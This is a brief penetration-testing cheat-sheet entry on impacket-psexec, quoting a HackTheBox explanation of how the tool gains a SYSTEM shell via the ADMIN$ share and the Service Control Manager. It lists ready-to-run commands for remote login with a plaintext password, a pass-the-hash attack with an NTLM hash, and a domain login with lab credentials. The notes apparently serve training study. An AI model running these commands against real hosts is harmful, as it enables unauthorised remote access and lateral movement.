impacket-psexec
Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host. - hackthebox
# Connect to a local account
impacket-psexec administrator:'Password123!'@10.10.110.17# Pass the hash attack
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125 
User - wley
Pass - transporter@4
Last updated